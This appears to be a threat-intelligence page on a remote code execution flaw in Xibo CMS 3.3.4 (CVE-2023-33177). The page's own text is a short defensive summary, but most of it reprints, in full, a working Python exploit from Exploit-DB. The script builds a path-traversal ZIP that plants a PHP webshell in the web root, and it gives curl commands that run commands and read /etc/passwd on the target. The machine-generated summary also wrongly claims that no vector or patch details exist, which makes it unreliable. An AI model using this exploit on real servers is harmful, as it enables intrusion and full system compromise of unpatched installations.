xibocms 3.3.4 - RCE
xibocms 3.3.4 - RCE
AI Analysis
Technical Summary
xibocms version 3.3.4 is affected by a remote code execution vulnerability. Exploit code has been published on Exploit-DB (ID 52500) in Python, indicating the vulnerability can be actively exploited. No details on the specific vulnerability vector or affected components are provided. There is no information about available patches or vendor advisories.
Potential Impact
Successful exploitation allows an attacker to execute arbitrary code remotely on the affected xibocms 3.3.4 installation. This can lead to full system compromise depending on the privileges of the application process.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a patch is available, restrict access to the affected application and monitor for exploit attempts. Consider isolating or disabling the vulnerable service if feasible.
Indicators of Compromise
- exploit-code: # Exploit Title: XiboCMS 3.3.4- Remote Code Execution # Google Dork: N/A # Date: 2025-11-18 # Exploit Author: complexusprada # Vendor Homepage: https://xibo.org.uk/ # Software Link: https://github.com/xibosignage/xibo-cms # Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4 # Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4 # CVE: CVE-2023-33177 # GHSA: GHSA-jj27-x85q-crqv # Category: webapps """ # Vulnerability Description: # Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout import # functionality. The application fails to properly validate file paths in the mapping.json # file within uploaded ZIP archives, allowing authenticated attackers to write files # outside the intended library directory using path traversal sequences (../../). # This results in arbitrary file upload and remote code execution. # Exploitation Details: # 1. Attacker creates a malicious ZIP file containing a valid Xibo layout structure # 2. The mapping.json file contains a path traversal payload (../../web/shell.php) # 3. A PHP webshell is placed at the corresponding path within the ZIP structure # 4. When the layout is imported, Xibo extracts files without proper path validation # 5. The webshell is written to the web root (/var/www/cms/web/shell.php) # 6. Attacker gains remote code execution via the webshell # Vulnerability Chain: # ZIP contains: library/../../web/shell.php # Mapping.json: {"file": "../../web/shell.php", ...} # Xibo reads: library/ + ../../web/shell.php # Xibo writes: /var/www/cms/library/temp/ + ../../web/shell.php # Result: /var/www/cms/web/shell.php (webshell in web root!) # Prerequisites: # - Valid Xibo CMS credentials (any authenticated user with layout import permission) # - Xibo CMS versions 1.8.0 - 2.3.16 or 3.0.0 - 3.3.4 # Exploitation Steps: # 1. Run this script to generate exploit.zip # 2. Log in to Xibo CMS # 3. Navigate to: Design → Layouts → Import # 4. Upload the generated exploit.zip file # 5. Even if JSON errors occur, the webshell has been written to disk # 6. Access webshell at: http://<target>/shell.php?cmd=<command> # Example: curl 'http://target/shell.php?cmd=id' # Mitigation: # Upgrade to patched versions: # - Xibo CMS 2.3.17+ (for 2.x branch) # - Xibo CMS 3.3.5+ (for 3.x branch) # Disclaimer: # This exploit is provided for educational purposes, authorized penetration testing, # and vulnerability research only. Only use against systems you own or have explicit # written permission to test. """ import zipfile import json import sys def create_exploit(): """Generate the malicious ZIP file for Xibo CMS RCE exploit""" print("[*] Xibo CMS Zip Slip RCE Exploit Generator") print("[*] CVE-2023-33177 - Path Traversal via Layout Import") print("[*] Affected: Xibo CMS 1.8.0-2.3.16, 3.0.0-3.3.4\n") # Valid Xibo 3.0 layout structure # This ensures the ZIP passes initial validation checks layout_json = { "layout": "Exploit Layout", "description": "Path Traversal Test", "layoutDefinitions": { "schemaVersion": 3, "width": 1920, "height": 1080, "backgroundColor": "#000000", "backgroundzIndex": 0, "code": "CVE-2023-33177", "actions": [], "regions": [], "drawers": [] } } # Empty playlist - triggers JSON import code path playlist_json = {} # VULNERABILITY: Path traversal in mapping.json # The 'file' field is not properly sanitized before file extraction # Xibo constructs the extraction path as: library/temp/ + file['file'] # Using ../../ allows escaping the library directory mapping_json = [{ "file": "../../web/shell.php", # Path traversal payload "name": "shell.php", "type": "module" }] # Simple PHP webshell for command execution # Accepts commands via GET parameter: ?cmd=<command> webshell = b'<?php system($_GET["cmd"]); ?>' # Create the malicious ZIP file try: with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf: # Add required Xibo layout files zf.writestr('layout.json', json.dumps(layout_json, indent=2)) zf.writestr('playlist.json', json.dumps(playlist_json)) zf.writestr('mapping.json', json.dumps(mapping_json)) # CRITICAL: The file path in the ZIP must match what Xibo expects # Xibo calls: $zip->getStream('library/' . $file['file']) # Therefore we place the file at: library/../../web/shell.php zf.writestr('library/../../web/shell.php', webshell) print("[+] Exploit ZIP created successfully: exploit.zip") print("\n[*] Exploitation Steps:") print(" 1. Log in to Xibo CMS with valid credentials") print(" 2. Navigate to: Design → Layouts → Import") print(" 3. Upload exploit.zip") print(" 4. Ignore any JSON errors (file is already written)") print(" 5. Access webshell: http://<target>/shell.php?cmd=<command>") print("\n[*] Example:") print(" curl 'http://target/shell.php?cmd=id'") print(" curl 'http://target/shell.php?cmd=cat%20/etc/passwd'") print() except Exception as e: print(f"[-] Error creating exploit: {e}", file=sys.stderr) sys.exit(1) if __name__ == "__main__": create_exploit()
xibocms 3.3.4 - RCE
Description
xibocms 3.3.4 - RCE
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
xibocms version 3.3.4 is affected by a remote code execution vulnerability. Exploit code has been published on Exploit-DB (ID 52500) in Python, indicating the vulnerability can be actively exploited. No details on the specific vulnerability vector or affected components are provided. There is no information about available patches or vendor advisories.
Potential Impact
Successful exploitation allows an attacker to execute arbitrary code remotely on the affected xibocms 3.3.4 installation. This can lead to full system compromise depending on the privileges of the application process.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a patch is available, restrict access to the affected application and monitor for exploit attempts. Consider isolating or disabling the vulnerable service if feasible.
Technical Details
- Edb Id
- 52500
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for xibocms 3.3.4 - RCE
# Exploit Title: XiboCMS 3.3.4- Remote Code Execution # Google Dork: N/A # Date: 2025-11-18 # Exploit Author: complexusprada # Vendor Homepage: https://xibo.org.uk/ # Software Link: https://github.com/xibosignage/xibo-cms # Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4 # Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4 # CVE: CVE-2023-33177 # GHSA: GHSA-jj27-x85q-crqv # Category: webapps """ # Vulnerability Description: # Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout impor... (4916 more characters)
Threat ID: 69d842c21cc7ad14da3f5b29
Added to database: 4/10/2026, 12:22:26 AM
Last enriched: 4/10/2026, 12:23:02 AM
Last updated: 4/10/2026, 8:31:04 AM
Views: 5
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.